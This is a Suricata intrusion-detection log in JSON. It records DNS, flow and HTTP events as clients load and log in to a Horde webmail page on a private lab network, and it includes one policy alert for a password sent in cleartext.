{"timestamp":"2020-02-29T00:19:29.000573+0000","flow_id":645029679087548,"event_type":"flow","src_ip":"192.168.10.122","src_port":51842,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:14:28.540604+0000","end":"2020-02-29T00:14:28.697243+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:19:31.000283+0000","event_type":"stats","stats":{"uptime":14823,"capture":{"kernel_packets":136721,"kernel_drops":0},"decoder":{"pkts":136725,"bytes":93889541,"invalid":192,"ipv4":135186,"ipv6":10,"ethernet":136725,"raw":0,"null":0,"sll":0,"tcp":129731,"udp":5248,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7094176},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2816,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2832,"synack":2823,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1853,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2403,"failed_udp":112},"tx":{"http":4729,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2483}},"flow_mgr":{"closed_pruned":2800,"new_pruned":17,"est_pruned":2456,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":0,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked
":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20505,"memcap_state":0,"memcap_global":0},"http":{"memuse":35546,"memcap":0}}} {"timestamp":"2020-02-29T00:19:35.000667+0000","flow_id":658082085123380,"event_type":"flow","src_ip":"192.168.10.122","src_port":33640,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:14:34.701748+0000","end":"2020-02-29T00:14:34.809817+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:19:35.000965+0000","flow_id":959704753418051,"event_type":"flow","src_ip":"192.168.10.122","src_port":39423,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:14:34.700227+0000","end":"2020-02-29T00:14:34.808864+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:19:36.000618+0000","flow_id":209077614025364,"event_type":"flow","src_ip":"192.168.10.122","src_port":45522,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:14:34.924308+0000","end":"2020-02-29T00:14:35.033032+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:19:37.321340+0000","flow_id":1179362285679512,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52900,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/login.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2067}} 
{"timestamp":"2020-02-29T00:19:37.452485+0000","flow_id":1590540979789703,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52902,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/mozilla.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":141}} {"timestamp":"2020-02-29T00:19:37.458114+0000","flow_id":1179362285679512,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52900,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/login.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2067},"app_proto":"http","fileinfo":{"filename":"\/login.php","state":"CLOSED","stored":false,"size":5873,"tx_id":0}} {"timestamp":"2020-02-29T00:19:37.455097+0000","flow_id":708895863071501,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52906,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/horde.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2236}} 
{"timestamp":"2020-02-29T00:19:37.458500+0000","flow_id":1498976572011859,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52908,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/accesskeys.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1005}} {"timestamp":"2020-02-29T00:19:37.456533+0000","flow_id":708895863071501,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52906,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/horde.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2236},"app_proto":"http","fileinfo":{"filename":"\/js\/horde.js","state":"CLOSED","stored":false,"size":6422,"tx_id":0}} {"timestamp":"2020-02-29T00:19:37.458990+0000","flow_id":708895863071501,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52906,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/login.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":280}} 
{"timestamp":"2020-02-29T00:19:37.458934+0000","flow_id":1179362285679512,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52900,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":9246}} {"timestamp":"2020-02-29T00:19:37.460469+0000","flow_id":1590540979789703,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52902,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/mozilla.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":141},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/mozilla.css","state":"CLOSED","stored":false,"size":173,"tx_id":0}} {"timestamp":"2020-02-29T00:19:37.460688+0000","flow_id":1590540979789703,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52902,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/js\/login.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1118}} 
{"timestamp":"2020-02-29T00:19:37.460939+0000","flow_id":708895863071501,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52906,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/login.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":280},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/login.js","state":"CLOSED","stored":false,"size":415,"tx_id":1}} {"timestamp":"2020-02-29T00:19:37.461204+0000","flow_id":708895863071501,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52906,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/horde-power1.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2258}} {"timestamp":"2020-02-29T00:19:37.479806+0000","flow_id":2243994484072541,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52904,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/prototype.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":29020},"app_proto":"http","fileinfo":{"filename":"\/js\/prototype.js","state":"TRUNCATED","stored":false,"size":106496,"tx_id":0}} 
{"timestamp":"2020-02-29T00:19:37.480900+0000","flow_id":2243994484072541,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52904,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/prototype.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":46054}} {"timestamp":"2020-02-29T00:19:37.561308+0000","flow_id":2243994484072541,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52904,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-default.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":87}} {"timestamp":"2020-02-29T00:19:37.616998+0000","flow_id":2243994484072541,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52904,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-default.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":87},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/button-default.png","state":"CLOSED","stored":false,"size":87,"tx_id":1}} 
{"timestamp":"2020-02-29T00:19:37.617541+0000","flow_id":2243994484072541,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52904,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":918}} {"timestamp":"2020-02-29T00:19:38.000205+0000","event_type":"stats","stats":{"uptime":14830,"capture":{"kernel_packets":136721,"kernel_drops":0},"decoder":{"pkts":136725,"bytes":93889541,"invalid":192,"ipv4":135186,"ipv6":10,"ethernet":136725,"raw":0,"null":0,"sll":0,"tcp":129731,"udp":5248,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093312},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2816,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2832,"synack":2823,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1853,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2403,"failed_udp":112},"tx":{"http":4729,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2483}},"flow_mgr":{"closed_pruned":2800,"new_pruned":17,"est_pruned":2456,"bypassed_pruned":0,"flows_checked":2,"flows_noti
meout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":19513,"memcap_state":0,"memcap_global":0},"http":{"memuse":259892,"memcap":0}}} {"timestamp":"2020-02-29T00:19:41.000397+0000","flow_id":479196697555204,"event_type":"flow","src_ip":"192.168.10.122","src_port":45154,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:14:39.946436+0000","end":"2020-02-29T00:14:40.054421+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:19:42.466236+0000","flow_id":1498976572011859,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52908,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/accesskeys.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1005},"app_proto":"http","fileinfo":{"filename":"\/js\/accesskeys.js","state":"CLOSED","stored":false,"size":2729,"tx_id":0}} {"timestamp":"2020-02-29T00:19:42.474814+0000","flow_id":1590540979789703,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52902,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/login.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1118},"app_proto":"http","fileinfo":{"filename":"\/js\/login.js","state":"CLOSED","stored":false,"size":3062,"tx_id":1}} {"timestamp":"2020-02-29T00:19:42.474870+0000","flow_id":1179362285679512,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52900,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":9246},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/screen.css","state":"CLOSED","stored":false,"size":48239,"tx_id":1}} {"timestamp":"2020-02-29T00:19:42.474831+0000","flow_id":708895863071501,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52906,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/horde-power1.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2258},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/horde-power1.png","state":"CLOSED","stored":false,"size":2258,"tx_id":2}} 
{"timestamp":"2020-02-29T00:19:42.622221+0000","flow_id":2243994484072541,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52904,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":918},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/favicon.ico","state":"CLOSED","stored":false,"size":918,"tx_id":2}} {"timestamp":"2020-02-29T00:19:45.000188+0000","event_type":"stats","stats":{"uptime":14837,"capture":{"kernel_packets":136862,"kernel_drops":0},"decoder":{"pkts":136870,"bytes":93972713,"invalid":192,"ipv4":135331,"ipv6":10,"ethernet":136870,"raw":0,"null":0,"sll":0,"tcp":129876,"udp":5248,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7094464},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2821,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2837,"synack":2828,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1858,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2403,"failed_udp":112},"tx":{"http":4740,"smtp":0,"tls":0,"dns_tcp":0,
"dns_udp":2483}},"flow_mgr":{"closed_pruned":2800,"new_pruned":17,"est_pruned":2460,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":19182,"memcap_state":0,"memcap_global":0},"http":{"memuse":35946,"memcap":0}}} {"timestamp":"2020-02-29T00:19:45.001812+0000","flow_id":1926025151001775,"event_type":"flow","src_ip":"192.168.10.122","src_port":47129,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:14:44.210095+0000","end":"2020-02-29T00:14:44.318670+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:19:46.460465+0000","flow_id":206771237029553,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":39566,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":48104,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:19:46.569640+0000","flow_id":206771237029553,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":39566,"proto":"UDP","dns":{"type":"answer","id":48104,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:46.569640+0000","flow_id":206771237029553,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":39566,"proto":"UDP","dns":{"type":"answer","id":48104,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:19:46.684313+0000","flow_id":2245338809397529,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":51086,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":48171,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:19:46.795379+0000","flow_id":2245338809397529,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51086,"proto":"UDP","dns":{"type":"answer","id":48171,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:46.795379+0000","flow_id":2245338809397529,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51086,"proto":"UDP","dns":{"type":"answer","id":48171,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:46.801513+0000","flow_id":2245338809397529,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":51086,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":48172,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":1}} {"timestamp":"2020-02-29T00:19:46.811702+0000","flow_id":969742112447211,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34886,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7421}} 
{"timestamp":"2020-02-29T00:19:46.910017+0000","flow_id":2245338809397529,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51086,"proto":"UDP","dns":{"type":"answer","id":48172,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:46.910017+0000","flow_id":2245338809397529,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51086,"proto":"UDP","dns":{"type":"answer","id":48172,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:46.915013+0000","flow_id":737255532685455,"in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.81","src_port":52910,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2012887,"rev":3,"signature":"ET POLICY Http Client Body contains pass= in cleartext","category":"Potential Corporate Privacy Violation","severity":1},"http":{"hostname":"mail.spiral.com","url":"\/login.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"\/services\/portal\/","length":20}} {"timestamp":"2020-02-29T00:19:46.915013+0000","flow_id":737255532685455,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52910,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/login.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"\/services\/portal\/","length":20}} 
{"timestamp":"2020-02-29T00:19:46.915013+0000","flow_id":737255532685455,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52910,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/login.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"\/services\/portal\/","length":20},"app_proto":"http","fileinfo":{"filename":"\/login.php","state":"CLOSED","stored":false,"size":113,"tx_id":0}} {"timestamp":"2020-02-29T00:19:46.942085+0000","flow_id":302055086514181,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":54089,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":39714,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:19:47.000564+0000","flow_id":345417056692646,"event_type":"flow","src_ip":"192.168.10.122","src_port":41179,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:14:46.043430+0000","end":"2020-02-29T00:14:46.152344+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 